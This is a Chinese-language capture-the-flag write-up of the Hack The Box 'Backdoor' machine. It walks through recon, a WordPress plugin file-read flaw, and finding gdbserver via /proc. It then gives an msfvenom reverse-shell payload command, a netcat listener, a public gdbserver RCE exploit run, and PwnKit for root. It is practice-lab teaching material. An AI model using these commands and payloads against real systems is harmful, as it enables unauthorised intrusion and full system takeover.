Backdoor - HackMD

--- title: 'Backdoor' disqus: hackmd tags: HTB --- [TOC] # Overall ## Used Skill - /wp-content/plugins directory explosure - LFI - burpsuite - /proc ## Rating - ⭐⭐☆☆☆☆☆☆☆☆ # Recon ## nmap ``` ~$ sudo nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.11.125 Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-18 16:53 CST Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 20.98% done; ETC: 16:53 (0:00:08 remaining) Stats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 28.94% done; ETC: 16:53 (0:00:10 remaining) Stats: 0:00:08 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 55.23% done; ETC: 16:53 (0:00:06 remaining) Nmap scan report for 10.10.11.125 Host is up (0.17s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA) | 256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA) |_ 256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Backdoor – Real-Life |_http-generator: WordPress 5.8.1 1337/tcp open waste? No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.92%E=4%D=3/18%OT=22%CT=1%CU=41794%PV=Y%DS=2%DC=T%G=Y%TM=623448A OS:4%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=107%TI=Z%CI=Z%II=I%TS=A)OPS OS:(O1=M505ST11NW7%O2=M505ST11NW7%O3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST1 OS:1NW7%O6=M505ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN OS:(R=Y%DF=Y%T=40%W=FAF0%O=M505NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N% OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD OS:=S) Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 1723/tcp) HOP RTT ADDRESS 1 398.78 ms 10.10.14.1 2 399.09 ms 10.10.11.125 ``` # Get Shell - 80 port 是 wordpress， wpscan 開掃，沒掃到什麼有用的 - 1337 不知道是什麼服務 - `wpscan --url http://10.10.11.125/ --enumerate u ` 掃描找到 user `admin` - `wpscan --url http://10.10.11.125/ --users admin --passwords rockyou.txt` 爆破未成功 - 可以直接看 `/wp-content/plugins` 底下有哪些插件，搜尋 ebook-download 後有看到 [LFI 漏洞](https://www.exploit-db.com/exploits/39575)，`http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/tmp/qwer` - 接下來要想辦法知道 1337 上開啟什麼服務，查了一下[資料](https://stackpointer.io/unix/linux-find-process-listening-port-using-proc-fs/344/)，可以透過 `/proc/net/tcp` 查看哪個 ip:port 和 inode 對應，再去爆破 `/proc/$pid/fd/$n`，用 `file` 之類的指令找到 fd 對應的 socket ，但是在 LFI 的情境下無法這樣獲得對應關係。另外可以查看 `/etc/services` 看管理者是不是有把 service - port 對應關係寫在裡面。這兩個方法在這題都不通 - 最後是 burpsuite 遍歷 `/proc/$pid/cmdline` 查看所有正在執行的命令 ![](https://hackmd.io/_uploads/rk3ReNMfc.png) ![](https://hackmd.io/_uploads/BJ33eLMf5.png) - 找到 1337 跑 gdbserver ![](https://hackmd.io/_uploads/rJA5eUMG5.png) - 搜尋 gdbserver exploit，找到 [gdbserver 9.2 rce](https://www.exploit-db.com/exploits/50539) - 產生 payload `msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.60 LPORT=4444 PrependFork=true -o rev.bin` - listen `nc -nvlp 4444` - exploit! ``` tmp$ python3 50539.py 10.10.11.125:1337 rev.bin [+] Connected to target. Preparing exploit [+] Found x64 arch [+] Sending payload [*] Pwned!! Check your listener ``` # Privilege Escalation - `linpeas.sh` - PwnKit > 另外 https://medium.com/@bocahganteng/write-up-backdoor-htb-c0092079ef2c 有寫到 root 似乎有開 screen，並且 user 剛好有權限掛 root 的 screen session